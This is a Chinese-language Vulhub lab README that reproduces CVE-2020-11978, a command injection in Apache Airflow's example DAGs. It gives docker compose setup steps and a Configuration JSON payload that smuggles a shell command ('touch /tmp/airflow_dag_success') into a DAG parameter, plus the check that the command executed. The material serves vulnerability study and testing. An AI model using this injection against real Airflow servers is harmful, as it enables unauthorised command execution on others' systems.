Files
vulhub/airflow/CVE-2020-11978/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

1.2 KiB
Raw Blame History

Apache Airflow 示例dag中的命令注入CVE-2020-11978

Apache Airflow是一款开源的分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞未授权的访问者可以通过这个漏洞在Worker中执行任意命令。

由于启动的组件比较多可能会有点卡运行此环境可能需要准备2G以上的内存。

参考链接:

漏洞环境

依次执行如下命令启动airflow 1.10.10

#初始化数据库
docker compose run airflow-init

#启动服务
docker compose up -d

漏洞复现

访问http://your-ip:8080进入airflow管理端example_trigger_target_dag前面的Off改为On

再点击执行按钮在Configuration JSON中输入{"message":"'\";touch /tmp/airflow_dag_success;#"},再点Trigger执行dag

等几秒可以看到执行成功:

到CeleryWorker容器中进行查看

docker compose exec airflow-worker ls -l /tmp

可以看到touch /tmp/airflow_dag_success成功被执行: